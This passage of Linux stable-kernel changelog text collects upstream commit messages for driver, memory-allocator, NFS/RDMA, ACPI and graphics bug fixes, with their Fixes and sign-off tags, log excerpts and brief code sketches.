to stable kernels which again enable it, and this is now the only
warning in the v4.7 builds.
Fixes: e09c978aae ("NFSv4.1: Fix Oopsable condition in server callback races")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Cc: Trond Myklebust <trond.myklebust@primarydata.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3890dce1d3 upstream.
If your data pool was pool 0, ceph_file_layout_from_legacy()
transformed that to -1 unconditionally, which broke upgrades.
We only want to do that for a fully zeroed ceph_file_layout,
so that it still maps to a file_layout_t. If any fields
are set, though, we trust fl_pgpool to be a valid pool.
Fixes: 7627151ea3 ("libceph: define new ceph_file_layout structure")
Link: http://tracker.ceph.com/issues/17825
Signed-off-by: Yan, Zheng <zyan@redhat.com>
Signed-off-by: Ilya Dryomov <idryomov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f773e36de3 upstream.
While testing OBJFREELIST_SLAB integration with pagealloc, we found a
bug where kmem_cache(sys) would be created with both CFLGS_OFF_SLAB &
CFLGS_OBJFREELIST_SLAB. When it happened, critical allocations needed
for loading drivers or creating new caches will fail.
The original kmem_cache is created early making OFF_SLAB not possible.
When kmem_cache(sys) is created, OFF_SLAB is possible and if pagealloc
is enabled it will try to enable it first under certain conditions.
Given kmem_cache(sys) reuses the original flag, you can have both flags
at the same time resulting in allocation failures and odd behaviors.
This fix discards allocator specific flags from memcg before calling
create_cache.
The bug exists since 4.6-rc1 and affects testing debug pagealloc
configurations.
Fixes: b03a017beb ("mm/slab: introduce new slab management type, OBJFREELIST_SLAB")
Link: http://lkml.kernel.org/r/1478553075-120242-1-git-send-email-thgarnie@google.com
Signed-off-by: Greg Thelen <gthelen@google.com>
Signed-off-by: Thomas Garnier <thgarnie@google.com>
Tested-by: Thomas Garnier <thgarnie@google.com>
Acked-by: Christoph Lameter <cl@linux.com>
Cc: Pekka Enberg <penberg@kernel.org>
Cc: David Rientjes <rientjes@google.com>
Cc: Joonsoo Kim <iamjoonsoo.kim@lge.com>
Cc: Vladimir Davydov <vdavydov.dev@gmail.com>
Cc: Michal Hocko <mhocko@kernel.org>
Cc: Johannes Weiner <hannes@cmpxchg.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f91346e8b5 upstream.
An interrupt may occur right after devm_request_irq() is called and
prior to the spinlock initialization, leading to a kernel oops,
as the interrupt handler uses the spinlock.
In order to prevent this problem, move the spinlock initialization
prior to requesting the interrupts.
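A hedged sketch of the reordering in probe (handler, irq and field
names assumed):
spin_lock_init(&host->lock);    /* must be ready before the handler can run */
ret = devm_request_irq(&pdev->dev, irq_err, mxs_mmc_irq_handler, 0,
                       dev_name(&pdev->dev), host);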
Fixes: e4243f13d1 (mmc: mxs-mmc: add mmc host driver for i.MX23/28)
Signed-off-by: Fabio Estevam <fabio.estevam@nxp.com>
Reviewed-by: Marek Vasut <marex@denx.de>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 091c531b09 upstream.
Since commit 44a7185c2a ("of/platform: Add common method to populate
default bus"), ARM64 platform devices are populated at the
arch_initcall_sync level; as a result, the platform_driver_probe calls
in both the iProc and NSP GPIO drivers fail with -ENODEV since by that
time the platform device was not yet registered.
Replace platform_driver_probe with platform_driver_register, which
allows the device to be registered later.
Fixes: 44a7185c2a ("of/platform: Add common method to populate default bus")
Signed-off-by: Ray Jui <ray.jui@broadcom.com>
Tested-by: Eric Anholt <eric@anholt.net>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 85915b63ad upstream.
When sun4i_codec_create_card fails, we do not assign a proper error
code to the return value. The return value would be 0 from the previous
function call, or we would have bailed out sooner. This would confuse
the driver core into thinking the device probe succeeded, when in fact
it didn't, leaving various devres based resources lingering.
Make the create_card function pass back a meaningful error code, and
assign it to the return value.
Fixes: 45fb6b6f2a ("ASoC: sunxi: add support for the on-chip codec on
early Allwinner SoCs")
Signed-off-by: Chen-Yu Tsai <wens@csie.org>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6d13f62d93 upstream.
skl_probe() releases a runtime pm ref unconditionally whereas
skl_remove() acquires one only if the device is wakeup capable.
Thus if the device is not wakeup capable, unloading and reloading
the module will result in the refcount being decreased below 0.
Fix it.
Fixes: d8c2dab838 ("ASoC: Intel: Add Skylake HDA audio driver")
Signed-off-by: Lukas Wunner <lukas@wunner.de>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c7e9d39831 upstream.
Sylvain Lemieux reports the LPC32xx GPIO driver is broken since
commit 762c2e46c0 ("gpio: of: remove of_gpiochip_and_xlate() and
struct gg_data"). Probably, gpio-etraxfs.c and gpio-davinci.c are
broken too.
Those drivers register multiple gpio_chips that are associated with a
single OF node, and their own .of_xlate() checks if the passed
gpio_chip is valid.
Now, the problem is of_find_gpiochip_by_node() returns the first
gpio_chip found to match the given node. So, .of_xlate() fails,
except for the first GPIO bank.
Reverting the commit could be a solution, but I do not want to go
back to the mess of struct gg_data. Another solution here is to
take the match by a node pointer and the success of .of_xlate().
It is a bit clumsy to call .of_xlate twice; for gpio_chip matching
and for really getting the gpio_desc index. Perhaps, our long-term
goal might be to convert the drivers to single chip registration,
but this commit will solve the problem until then.
Fixes: 762c2e46c0 ("gpio: of: remove of_gpiochip_and_xlate() and struct gg_data")
Signed-off-by: Masahiro Yamada <yamada.masahiro@socionext.com>
Reported-by: Sylvain Lemieux <slemieux.tyco@gmail.com>
Tested-by: David Lechner <david@lechnology.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 812d47889a upstream.
This fixes the irq allocation in this driver to not print:
irq: Cannot allocate irq_descs @ IRQ34, assuming pre-allocated
irq: Cannot allocate irq_descs @ IRQ66, assuming pre-allocated
Which happens because the driver already called irq_alloc_descs()
and so the change to use irq_domain_add_simple resulted in calling
irq_alloc_descs() twice.
Modernize the irq allocation in this driver to use the
irq_domain_add_linear flow directly and eliminate the use of
irq_domain_add_simple/legacy.
Fixes: ce931f571b ("gpio/mvebu: convert to use irq_domain_add_simple()")
Signed-off-by: Jason Gunthorpe <jgunthorpe@obsidianresearch.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9ca488dd53 upstream.
The batadv_hard_iface::neigh_list is accessed via rcu based primitives.
Thus all operations done on it have to fulfill the requirements by RCU. So
using non-RCU mechanisms like hlist_add_head is not allowed because it
misses the barriers required to protect concurrent readers when accessing
the data behind the pointer.
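A hedged sketch of the change (variable names assumed): use the
RCU-aware primitive so concurrent readers see a fully initialised entry.
hlist_add_head_rcu(&hardif_neigh->list, &hard_iface->neigh_list);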
Fixes: cef63419f7 ("batman-adv: add list of unique single hop neighbors per hard-interface")
Signed-off-by: Sven Eckelmann <sven.eckelmann@open-mesh.com>
Acked-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 98756f5319 upstream.
Commit 103544d869 ("ACPI,PCI,IRQ: reduce resource requirements")
replaced the addition of PIRQ_PENALTY_PCI_USING in acpi_pci_link_allocate()
with an addition in acpi_irq_pci_sharing_penalty(), but f7eca374f0
("ACPI,PCI,IRQ: separate ISA penalty calculation") removed the use
of acpi_irq_pci_sharing_penalty() for ISA IRQs.
Therefore, PIRQ_PENALTY_PCI_USING is missing from ISA IRQs used by
interrupt links. Include that penalty by adding it in the
acpi_pci_link_allocate() path.
Fixes: f7eca374f0 (ACPI,PCI,IRQ: separate ISA penalty calculation)
Signed-off-by: Sinan Kaya <okaya@codeaurora.org>
Acked-by: Bjorn Helgaas <bhelgaas@google.com>
Tested-by: Jonathan Liu <net147@gmail.com>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f1caa61df2 upstream.
Ondrej reported that IRQs stopped working in v4.7 on several
platforms. A typical scenario, from Ondrej's VT82C694X/694X, is:
ACPI: Using PIC for interrupt routing
ACPI: PCI Interrupt Link [LNKA] (IRQs 1 3 4 5 6 7 10 *11 12 14 15)
ACPI: No IRQ available for PCI Interrupt Link [LNKA]
8139too 0000:00:0f.0: PCI INT A: no GSI
We're using PIC routing, so acpi_irq_balance == 0, and LNKA is already
active at IRQ 11. In that case, acpi_pci_link_allocate() only tries
to use the active IRQ (IRQ 11) which also happens to be the SCI.
We should penalize the SCI by PIRQ_PENALTY_PCI_USING, but
irq_get_trigger_type(11) returns something other than
IRQ_TYPE_LEVEL_LOW, so we penalize it by PIRQ_PENALTY_ISA_ALWAYS
instead, which makes acpi_pci_link_allocate() assume the IRQ isn't
available and give up.
Add acpi_penalize_sci_irq() so platforms can tell us the SCI IRQ,
trigger, and polarity directly and we don't have to depend on
irq_get_trigger_type().
Fixes: 103544d869 (ACPI,PCI,IRQ: reduce resource requirements)
Link: http://lkml.kernel.org/r/201609251512.05657.linux@rainbow-software.org
Reported-by: Ondrej Zary <linux@rainbow-software.org>
Acked-by: Bjorn Helgaas <bhelgaas@google.com>
Signed-off-by: Sinan Kaya <okaya@codeaurora.org>
Tested-by: Jonathan Liu <net147@gmail.com>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit eeaed4bb5a upstream.
We do not want to store the SCI penalty in the acpi_isa_irq_penalty[]
table because acpi_isa_irq_penalty[] only holds ISA IRQ penalties and
there's no guarantee that the SCI is an ISA IRQ. We add in the SCI
penalty as a special case in acpi_irq_get_penalty().
But if we called acpi_penalize_isa_irq() or acpi_irq_penalty_update()
for an SCI that happened to be an ISA IRQ, they stored the SCI
penalty (part of the acpi_irq_get_penalty() return value) in
acpi_isa_irq_penalty[]. Subsequent calls to acpi_irq_get_penalty()
returned a penalty that included *two* SCI penalties.
Fixes: 103544d869 (ACPI,PCI,IRQ: reduce resource requirements)
Signed-off-by: Sinan Kaya <okaya@codeaurora.org>
Acked-by: Bjorn Helgaas <bhelgaas@google.com>
Tested-by: Jonathan Liu <net147@gmail.com>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6d4952d9d9 upstream.
hw_random carefully avoids using a stack buffer except in
add_early_randomness(). This causes a crash in virtio_rng if
CONFIG_VMAP_STACK=y.
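A hedged sketch of add_early_randomness() reading into the core's
long-lived buffer instead of a stack array (helper names treated as
assumptions):
size_t size = min_t(size_t, 16, rng_buffer_size());

bytes_read = rng_get_data(rng, rng_buffer, size, 1);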
Reported-by: Matt Mullins <mmullins@mmlx.us>
Tested-by: Matt Mullins <mmullins@mmlx.us>
Fixes: d3cc799647 ("hwrng: fetch randomness only after device init")
Signed-off-by: Andy Lutomirski <luto@kernel.org>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 62e931fac4 upstream.
gen_pool_alloc_algo() iterates over the chunks of a pool trying to find
a contiguous block of memory that satisfies the allocation request.
The shortcut
if (size > atomic_read(&chunk->avail))
continue;
makes the loop skip over chunks that do not have enough bytes left to
fulfill the request. There are two situations, though, where an
allocation might still fail:
(1) The available memory is not contiguous, i.e. the request cannot
be fulfilled due to external fragmentation.
(2) A race condition. Another thread runs the same code concurrently
and is quicker to grab the available memory.
In those situations, the loop calls pool->algo() to search the entire
chunk, and pool->algo() returns some value that is >= end_bit to
indicate that the search failed. This return value is then assigned to
start_bit. The variables start_bit and end_bit describe the range that
should be searched, and this range should be reset for every chunk that
is searched. Today, the code fails to reset start_bit to 0. As a
result, prefixes of subsequent chunks are ignored. Memory allocations
might fail even though there is plenty of room left in these prefixes of
those other chunks.
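A hedged sketch of the corrected loop shape (abridged; surrounding code
assumed), resetting start_bit for every chunk:
list_for_each_entry_rcu(chunk, &pool->chunks, next_chunk) {
        if (size > atomic_read(&chunk->avail))
                continue;

        start_bit = 0;  /* do not inherit the previous chunk's offset */
        end_bit = chunk_size(chunk) >> order;
        /* ... bitmap search over [start_bit, end_bit) follows ... */
}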
Fixes: 7f184275aa ("lib, Make gen_pool memory allocator lockless")
Link: http://lkml.kernel.org/r/1477420604-28918-1-git-send-email-danielmentz@google.com
Signed-off-by: Daniel Mentz <danielmentz@google.com>
Reviewed-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
Acked-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d0208639db upstream.
Before merging all different stack tracers the call traces printed had
an indicator if an entry can be considered reliable or not.
Unreliable entries were put in braces, reliable not. Currently all
lines contain these extra braces.
This patch restores the old behaviour by adding an extra "reliable"
parameter to the callback functions. Only show_trace currently makes
use of it.
Before:
[ 0.804751] Call Trace:
[ 0.804753] ([<000000000017d0e0>] try_to_wake_up+0x318/0x5e0)
[ 0.804756] ([<0000000000161d64>] create_worker+0x174/0x1c0)
After:
[ 0.804751] Call Trace:
[ 0.804753] ([<000000000017d0e0>] try_to_wake_up+0x318/0x5e0)
[ 0.804756] [<0000000000161d64>] create_worker+0x174/0x1c0
Fixes: 758d39ebd3 ("s390/dumpstack: merge all four stack tracers")
Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com>
Signed-off-by: Martin Schwidefsky <schwidefsky@de.ibm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 83ab7dad06 upstream.
It is likely that checking the result of 'pcf2123_write_reg' is expected
here.
Also fix a small style issue. The '{' at the beginning of the function
is misplaced.
Fixes: 809b453b76 ("rtc: pcf2123: clean up writes to the rtc chip")
Signed-off-by: Christophe JAILLET <christophe.jaillet@wanadoo.fr>
Signed-off-by: Alexandre Belloni <alexandre.belloni@free-electrons.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 34b89b2967 upstream.
If the driver is built as a module, autoload won't work because the module
alias information is not filled. So user-space can't match the registered
device with the corresponding module.
Export the module alias information using the MODULE_DEVICE_TABLE() macro.
Before this patch:
$ modinfo drivers/clk/samsung/clk-exynos-audss.ko | grep alias
alias: platform:exynos-audss-clk
After this patch:
$ modinfo drivers/clk/samsung/clk-exynos-audss.ko | grep alias
alias: platform:exynos-audss-clk
alias: of:N*T*Csamsung,exynos5420-audss-clockC*
alias: of:N*T*Csamsung,exynos5420-audss-clock
alias: of:N*T*Csamsung,exynos5410-audss-clockC*
alias: of:N*T*Csamsung,exynos5410-audss-clock
alias: of:N*T*Csamsung,exynos5250-audss-clockC*
alias: of:N*T*Csamsung,exynos5250-audss-clock
alias: of:N*T*Csamsung,exynos4210-audss-clockC*
alias: of:N*T*Csamsung,exynos4210-audss-clock
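A hedged sketch of the one-line addition (match-table name assumed):
MODULE_DEVICE_TABLE(of, exynos_audss_clk_of_match);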
Fixes: 4d252fd571 ("clk: samsung: Allow modular build of the Audio Subsystem CLKCON driver")
Signed-off-by: Javier Martinez Canillas <javier@osg.samsung.com>
Reviewed-by: Krzysztof Kozlowski <krzk@kernel.org>
Tested-by: Krzysztof Kozlowski <krzk@kernel.org>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5938768388 upstream.
struct clocksource is also used by the clk notifier callback, to
unregister and re-register the clocksource with a different clock rate.
clocksource_mmio_init does not pass back a pointer to the struct used,
and the clk notifier callback assumes that the struct clocksource in
struct sun5i_timer_clksrc is valid. This results in a kernel NULL
pointer dereference when the hstimer clock is changed:
Unable to handle kernel NULL pointer dereference at virtual address 00000004
[<c03a4678>] (clocksource_unbind) from [<c03a46d4>] (clocksource_unregister+0x2c/0x44)
[<c03a46d4>] (clocksource_unregister) from [<c0a6f350>] (sun5i_rate_cb_clksrc+0x34/0x3c)
[<c0a6f350>] (sun5i_rate_cb_clksrc) from [<c035ea50>] (notifier_call_chain+0x44/0x84)
[<c035ea50>] (notifier_call_chain) from [<c035edc0>] (__srcu_notifier_call_chain+0x44/0x60)
[<c035edc0>] (__srcu_notifier_call_chain) from [<c035edf4>] (srcu_notifier_call_chain+0x18/0x20)
[<c035edf4>] (srcu_notifier_call_chain) from [<c0670174>] (__clk_notify+0x70/0x7c)
[<c0670174>] (__clk_notify) from [<c06702c0>] (clk_propagate_rate_change+0xa4/0xc4)
[<c06702c0>] (clk_propagate_rate_change) from [<c0670288>] (clk_propagate_rate_change+0x6c/0xc4)
Revert the commit for now. clocksource_mmio_init can be made to pass back
a pointer, but the code churn and usage of an inner struct might not be
worth it.
Fixes: 157dfadef8 ("clocksource/drivers/timer_sun5i: Replace code by clocksource_mmio_init")
Reported-by: Maxime Ripard <maxime.ripard@free-electrons.com>
Signed-off-by: Chen-Yu Tsai <wens@csie.org>
Cc: linux-sunxi@googlegroups.com
Cc: Daniel Lezcano <daniel.lezcano@linaro.org>
Cc: linux-arm-kernel@lists.infradead.org
Link: http://lkml.kernel.org/r/20161018054918.26855-1-wens@csie.org
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7065906096 upstream.
The driver was decrementing online_queues prior to attempting to
delete those IO queues, so the driver ended up not requesting that the
controller delete any. This patch saves online_queues prior to
suspending them, and passes that count when deleting IO queues.
Fixes: c21377f8 ("nvme: Suspend all queues before deletion")
Signed-off-by: Keith Busch <keith.busch@intel.com>
Reviewed-by: Christoph Hellwig <hch@lst.de>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit cace564f8b upstream.
The ctxt's count field is overloaded to mean the number of pages in
the ctxt->page array and the number of SGEs in the ctxt->sge array.
Typically these two numbers are the same.
However, when an inline RPC reply is constructed from an xdr_buf
with a tail iovec, the head and tail often occupy the same page,
but each are DMA mapped independently. In that case, ->count equals
the number of pages, but it does not equal the number of SGEs.
There's one more SGE, for the tail iovec. Hence there is one more
DMA mapping than there are pages in the ctxt->page array.
This isn't a real problem until the server's iommu is enabled. Then
each RPC reply that has content in that iovec orphans a DMA mapping
that consists of real resources.
krb5i and krb5p always populate that tail iovec. After a couple
million sent krb5i/p RPC replies, the NFS server starts behaving
erratically. Reboot is needed to clear the problem.
Fixes: 9d11b51ce7 ("svcrdma: Fix send_reply() scatter/gather set-up")
Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9995237bba upstream.
Message from syslogd@klimt at Aug 18 17:00:37 ...
kernel:page:ffffea0020639b00 count:0 mapcount:0 mapping: (null) index:0x0
Aug 18 17:00:37 klimt kernel: flags: 0x2fffff80000000()
Aug 18 17:00:37 klimt kernel: page dumped because: VM_BUG_ON_PAGE(page_ref_count(page) == 0)
Aug 18 17:00:37 klimt kernel: kernel BUG at /home/cel/src/linux/linux-2.6/include/linux/mm.h:445!
Aug 18 17:00:37 klimt kernel: RIP: 0010:[<ffffffffa05c21c1>] svc_rdma_sendto+0x641/0x820 [rpcrdma]
send_reply() assigns its page argument as the first page of ctxt. On
error, send_reply() already invokes svc_rdma_put_context(ctxt, 1);
which does a put_page() on that very page. No need to do that again
as svc_rdma_sendto exits.
Fixes: 3e1eeb9808 ("svcrdma: Close connection when a send error occurs")
Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 582ab27a06 upstream.
The NFC version reply size is checked against only the header size, not
against the full message size. That may potentially lead to
uninitialized memory access in the version data.
That leads to warnings when the version data is accessed:
drivers/misc/mei/bus-fixup.c: warning: '*((void *)&ver+11)' may be used uninitialized in this function [-Wuninitialized]: => 212:2
Reported in
Build regressions/improvements in v4.9-rc3
https://lkml.org/lkml/2016/10/30/57
Fixes: 59fcd7c63a (mei: nfc: Initial nfc implementation)
Signed-off-by: Alexander Usyskin <alexander.usyskin@intel.com>
Signed-off-by: Tomas Winkler <tomas.winkler@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 261d7794c4 upstream.
Instantiating the rmi4 I2C transport driver without interrupts assigned
(for example using manual i2c instantiation from the command line)
causes the driver to fail to load, but it does not clean up its regulator
or transport device registrations. The result is a crash at a later time,
for example when rebooting the system.
Fixes: 946c8432aa ("Input: synaptics-rmi4 - support regulator supplies")
Cc: Bjorn Andersson <bjorn.andersson@linaro.org>
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bbc2ceeb32 upstream.
Instantiating the rmi4 SPI transport driver without an interrupt assigned
causes the driver to fail to load, but it does not clean up its transport
device registration. The result may be a crash at a later time, for
example when rebooting the system.
Fixes: 8d99758dee ("Input: synaptics-rmi4 - add SPI transport driver")
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2e91838bf7 upstream.
Coverity reports:
Passing argument 152UL /* sizeof (*wdd) */ to function __devres_alloc_node
and then casting the return value to struct watchdog_device ** is
suspicious.
Allocation size needs to be sizeof(*rcwdd), not sizeof(*wdd).
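A hedged sketch of the corrected allocation (release-callback name
assumed):
rcwdd = devres_alloc(devm_watchdog_unregister_device, sizeof(*rcwdd),
                     GFP_KERNEL);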
Fixes: 83fbae5a14 ("watchdog: Add a device managed API for ...")
Cc: Neil Armstrong <narmstrong@baylibre.com>
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Acked-by: Neil Armstrong <narmstrong@baylibre.com>
Signed-off-by: Wim Van Sebroeck <wim@iguana.be>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bea64033dd upstream.
It turns out that the disable_dmar_iommu() code-path tried
to get the device_domain_lock recursively, which will
deadlock when this code runs on dmar removal. Fix both
code-paths that could lead to the deadlock.
Fixes: 55d940430a ('iommu/vt-d: Get rid of domain->iommu_lock')
Signed-off-by: Joerg Roedel <jroedel@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c3db901c54 upstream.
The current code misses freeing the domain id when freeing a domain of
struct dma_ops_domain.
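A hedged sketch of the missing release in the dma_ops_domain free path
(field layout assumed):
domain_id_free(dom->domain.id);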
Signed-off-by: Baoquan He <bhe@redhat.com>
Fixes: ec487d1a11 ('x86, AMD IOMMU: add domain allocation and deallocation functions')
Signed-off-by: Joerg Roedel <jroedel@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 62bdf94a20 upstream.
When a LOCALINV WR is flushed, the frmr is marked STALE, then
frwr_op_unmap_sync DMA-unmaps the frmr's SGL. These STALE frmrs
are then recovered when frwr_op_map hunts for an INVALID frmr to
use.
All other cases that need frmr recovery leave that SGL DMA-mapped.
The FRMR recovery path unconditionally DMA-unmaps the frmr's SGL.
To avoid DMA unmapping the SGL twice for flushed LOCAL_INV WRs,
alter the recovery logic (rather than the hot frwr_op_unmap_sync
path) to distinguish among these cases. This solution also takes
care of the case where multiple LOCAL_INV WRs are issued for the
same rpcrdma_req, some complete successfully, but some are flushed.
Reported-by: Vasco Steinmetz <linux@kyberraum.net>
Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Tested-by: Vasco Steinmetz <linux@kyberraum.net>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a053fb7e51 upstream.
To free fences, call_rcu() is used, which calls amd_sched_fence_free()
after a grace period. During teardown, there is no guarantee all
callbacks have finished, so sched_fence_slab may be destroyed before
all fences have been freed. If we are lucky, this results in some slab
warnings, if not, we get a crash in one of rcu threads because callback
is called after amdgpu has already been unloaded.
Fix it with a rcu_barrier().
Fixes: 189e0fb763 ("drm/amdgpu: RCU protected amd_sched_fence_release")
Acked-by: Chunming Zhou <david1.zhou@amd.com>
Reviewed-by: Christian König <christian.koenig@amd.com>
Signed-off-by: Grazvydas Ignotas <notasas@gmail.com>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9bcffe7575 upstream.
After commit 1cf6e8fc83 ("tty/serial: at91: fix RTS line management
when hardware handshake is enabled"), the hardware handshake wasn't
functional anymore on Atmel platforms (beside SAMA5D2).
To understand why, one has to understand the flag ATMEL_US_USMODE_HWHS
first:
Before commit 1cf6e8fc83 ("tty/serial: at91: fix RTS line management
when hardware handshake is enabled"), this flag was never set.
Thus, the CTS/RTS where only handled by serial_core (and everything
worked just fine).
This commit introduced the use of the ATMEL_US_USMODE_HWHS flag,
enabling it for all boards when the user space enables flow control.
When the ATMEL_US_USMODE_HWHS is set, the Atmel USART controller
handles a part of the flow control job:
- disable the transmitter when the CTS pin gets high.
- drive the RTS pin high when the DMA buffer transfer is completed or
PDC RX buffer full or RX FIFO is beyond threshold. (depending on the
controller version).
NB: This feature is *not* mandatory for the flow control to work.
(Nevertheless, it's very useful if low latencies are needed.)
Now, the specifics of the ATMEL_US_USMODE_HWHS flag:
- For platforms with DMAC and no FIFOs (sam9x25, sam9x35, sama5D3,
sama5D4, sam9g15, sam9g25, sam9g35)* this feature simply doesn't work.
( source: https://lkml.org/lkml/2016/9/7/598 )
Tested on sam9g35: the RTS pin always stays up, even when RXEN=1
or a new DMA transfer descriptor is set.
=> ATMEL_US_USMODE_HWHS must not be used for those platforms
- For platforms with a PDC (sam926{0,1,3}, sam9g10, sam9g20, sam9g45,
sam9g46)*, there's another kind of problem. Once the flag
ATMEL_US_USMODE_HWHS is set, the RTS pin can't be driven anymore via
RTSEN/RTSDIS in USART Control Register. The RTS pin can only be driven
by enabling/disabling the receiver or setting RCR=RNCR=0 in the PDC
(Receive (Next) Counter Register).
=> Doing this is beyond the scope of this patch and could add other
bugs, so the original (and working) behaviour should be set for those
platforms (meaning ATMEL_US_USMODE_HWHS flag should be unset).
- For platforms with a FIFO (sama5d2)*, the RTS pin is driven according
to the RX FIFO thresholds, and can be also driven by RTSEN/RTSDIS in
USART Control Register. No problem here.
(This was the use case of commit 1cf6e8fc83 ("tty/serial: at91: fix
RTS line management when hardware handshake is enabled"))
NB: If the CTS pin is declared as a GPIO in the DTS (for instance
cts-gpios = <&pioA PIN_PB31 GPIO_ACTIVE_LOW>), the transmitter will be
disabled.
=> ATMEL_US_USMODE_HWHS flag can be set for this platform ONLY IF the
CTS pin is not a GPIO.
So, the only case when ATMEL_US_USMODE_HWHS can be enabled is when
(atmel_use_fifo(port) &&
!mctrl_gpio_to_gpiod(atmel_port->gpios, UART_GPIO_CTS))
Tested on all Atmel USART controller flavours:
AT91SAM9G35-CM (DMAC flavour), AT91SAM9G20-EK (PDC flavour),
SAMA5D2xplained (FIFO flavour).
* the list may not be exhaustive
Fixes: 1cf6e8fc83 ("tty/serial: at91: fix RTS line management when hardware handshake is enabled")
Signed-off-by: Richard Genoud <richard.genoud@gmail.com>
Acked-by: Alexandre Belloni <alexandre.belloni@free-electrons.com>
Acked-by: Cyrille Pitchen <cyrille.pitchen@atmel.com>
Acked-by: Uwe Kleine-König <u.kleine-koenig@pengutronix.de>
[nicolas.ferre@atmel.com: adapt to 4.4.x kernel for stable by adding
the atmel_port variable declaration which was missing]
Signed-off-by: Nicolas Ferre <nicolas.ferre@atmel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fbb21c5202 upstream.
According to BSpec, cdclk for BDW has to be not less than 432 MHz with DP
audio enabled, port width x4, and link rate HBR2 (5.4 GHz). With cdclk less
than 432 MHz, enabling audio leads to pipe FIFO underruns and displays
cycling on/off.
From BSpec:
"Display» BDW-SKL» dpr» [Register] DP_TP_CTL [BDW+,EXCLUDE(CHV)]
Workaround : Do not use DisplayPort with CDCLK less than 432 MHz, audio
enabled, port width x4, and link rate HBR2 (5.4 GHz), or else there may
be audio corruption or screen corruption."
Since, some DP configurations (e.g., MST) use port width x4 and HBR2
link rate, let's increase the cdclk to >= 432 MHz to enable audio for those
cases.
v4: Changed commit message
v3: Combine BDW pixel rate adjustments into a function (Jani)
v2: Restrict fix to BDW
Retain the set cdclk across modesets (Ville)
Signed-off-by: Dhinakaran Pandiyan <dhinakaran.pandiyan@intel.com>
Reviewed-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Reviewed-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1478026080-2925-1-git-send-email-dhinakaran.pandiyan@intel.com
